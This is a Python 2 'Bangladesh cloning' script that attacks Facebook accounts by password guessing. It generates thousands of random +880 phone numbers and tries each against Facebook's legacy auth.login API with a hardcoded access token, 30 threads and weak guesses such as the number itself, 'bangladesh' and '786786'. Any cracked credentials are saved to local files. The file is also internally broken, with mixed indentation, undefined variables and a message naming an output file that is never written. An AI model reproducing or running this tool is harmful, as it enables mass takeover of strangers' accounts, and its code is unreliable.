import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, getpass
os.system('rm -rf .txt')
for n in range(40000):
    nmbr = random.randint(1111111, 9999999)
    sys.stdout = open('.txt', 'a')
    print nmbr 
    sys.stdout.flush()

try:
    import requests
except ImportError:
    os.system('pip2 install requests')

try:
    import mechanize
except ImportError:
    os.system('pip2 install mechanize')
    time.sleep(1)
    os.system('python2 .README.md')

from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent', 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def exb():
    print '[!] Exit Successfully'
    os.sys.exit()


def exxb():
    print '[!] \x1b[1;91m MOST WELL \x1b[3;92;40m COME\x1b[1;95m SO\x1b[1;97mMI \x1b[1;91m\x1b[0;34;40m'
    os.sys.exit()
def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')

def psb(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.03)
back = 0
oks = []
id = []
cpb = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
logo = """


\033[1;97mBANGLADESH CLONING CODE

\033[1;95m\033[1;96m175,165,191, 192, 193, 
\033[1;95m\033[1;93m194, 195, 196, 197, 198, 199

"""
logo1 = """

  \033[1;91m_________________      _____   .___ 
 \033[1;92m/   _____/\_____  \    /     \  |   |
\033[1;93m \_____  \  /   |   \  /  \ /  \ |   |
\033[1;94m /        \/    |    \/    Y    \|   |
\033[1;96m/_______  /\_______  /\____|__  /|___|
\033[1;95m        \/         \/         \/      
"""

##### LICENSE #####
#=================#
def lisensi():
	os.system('clear')
	login()
####login#########
def login():
	os.system('clear')
	print logo1
        psb('\x1b[1;95m[\x1b[1;92m1\x1b[1;94m]  \x1b[1;93mSTART PROCESS')
        pilih_login()

def pilih_login():
	peak = raw_input("\n\033[3;92mChoose an Option: \033[1;0m")
	if peak =="":
		print "\x1b[1;91mFill In Correctly"
		pilih_login()
        elif peak =="1":
		somi()
	elif peak =="0":
		keluar()
        else:
		print"\033[1;91m[!] Invalid Option"
		keluar()


def somi():
	os.system('clear')
	print logo1
	psb('\x1b[1;95m[\x1b[1;92m1\x1b[1;94m]  \x1b[1;93mSTART BANGLADESH ATTACK')
	time.sleep(0.05)
	psb('\x1b[1;95m[\x1b[1;92m1\x1b[1;94m]  \x1b[1;96mCLOSE NOW')
        time.sleep(0.05)
	action()

def action():
	peak = raw_input('\n\033[3;96mCHOOSE AN OPTION:\033[1;0m')
	if peak =='':
		print '[!] Fill In Correctly'
		action()
	elif peak =="1":             
        os.system("clear")
        print logo1
        print logo1
        try:
            c = raw_input("\033[1;97mCHOOSE : ")
            k="+880"
            idlist = ('.txt')
            for line in open(idlist,"r").readlines():
                id.append(line.strip())
        except IOError:
            print ("[!] File Not Found")
            raw_input("\n[ Back ]")
            somi()
    elif peak =='0':
        login()
    else:
        print '[!] Fill In Correctly'
        action()
    
    print 47* '\033[1;97m='
    xxx = str(len(id))
    psb('\033[1;97m[+] \033[1;93mTOTAL NUMBERS: ' + xxx)
    time.sleep(0.5)
    psb('\033[1;97m[\xe2\x9c\x93]\033[1;96m PLEASE WAIT, PROCESS IS START..')
    time.sleep(0.5)
    psb('\033[1;97m[!] \033[1;92mTO STOP THIS PROCESS PRESS Ctrl THEN z')
    time.sleep(0.5)
    print 47* '\033[1;97m='
    def main(arg):
		global cpb,oks
		user = arg
		try:
			os.mkdir('save')
		except OSError:
			pass
		try:
			pass1 = user
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;93m(Open \x1b[1;94mNow \x1b[1;97m)  ' + k + c + user + '\x1b[1;94m =\x1b[1;96m' + pass1                                       
                okb = open('save/successfull.txt', 'a')
                okb.write(k+c+user+pass1+'\n')
                okb.close()
                oks.append(c+user+pass1)
            else:
                if 'www.facebook.com' in q['error_msg']:
                    print '\033[1;92m(Aftar \x1b[1;93m7days \x1b[1;92m) ' + k + c + user + '\x1b[1;94m = \x1b[1;96m' + pass1
                    cps = open('save/checkpoint.txt', 'a')
                    cps.write(k+c+user+pass1+'\n')
                    cps.close()
                    cpb.append(c+user+pass1)
                else:
                    pass2 = "bangladesh"
                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;93m(Open \x1b[1;94mNow \x1b[1;97m)  ' + k + c + user +  '\x1b[1;94m = \x1b[1;96m' + pass2
                        okb = open('save/successfull.txt', 'a')
                        okb.write(k+c+user+pass2+'\n')
                        okb.close()
                        oks.append(c+user+pass2)
                    else:
                        if 'www.facebook.com' in q['error_msg']:
                            print '\033[1;92m(Aftar \x1b[1;93m7days \x1b[1;92m) ' + k + c + user + '\x1b[1;94m = \x1b[1;96m' + pass2
                            cps = open('save/checkpoint.txt', 'a')
                            cps.write(k+c+user+pass2+'\n')
                            cps.close()
                            cpb.append(c+user+pass2)
                        else:
                            pass3="786786"
                            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                            q = json.load(data)
                            if 'access_token' in q:
                                print '\x1b[1;93m(Open\x1b[1;94m Now \x1b[1;97m)  ' + k + c + user + '\x1b[1;94m = \x1b[1;96m' + pass3
                                okb = open('save/successfull.txt', 'a')
                                okb.write(k+c+user+pass3+'\n')
                                okb.close()
                                oks.append(c+user+pass3)
                            else:
                                if 'www.facebook.com' in q['error_msg']:
                                    print '\033[1;92m(Aftar \x1b[1;93m7days \x1b[1;92m) ' + k + c + user + '\x1b[1;94m = \x1b[1;96m' + pass3 
                                    cps = open('save/checkpoint.txt', 'a')
                                    cps.write(k+c+user+pass3+'\n')
                                    cps.close()
                                    cpb.append(c+user+pass3)
                                             
 				                 							
		except:
			pass
		
	p = ThreadPool(30)
	p.map(main, id)
	print 47* '='
	print '[✓] PROCESS COMPLETE..'
	print '[✓] TOTAL OPEN NOW / AFTAR 7 DAYS : '+str(len(oks))+'/'+str(len(cpb))
	print('[✓] CLONED ACCOUNT  : save/cloned.txt')
	print ('[!!] PLEASE CLEAR TERMUX DATA EVERYDAY YOUR STAR BOY WITH U')
	print 'ALLAH HAFIZ'
    print 47* '='
	
	raw_input("\n\033[1;95m[\033[1;91mBack\033[1;95m]")
	login()	
          
if __name__ == '__main__':
	login()
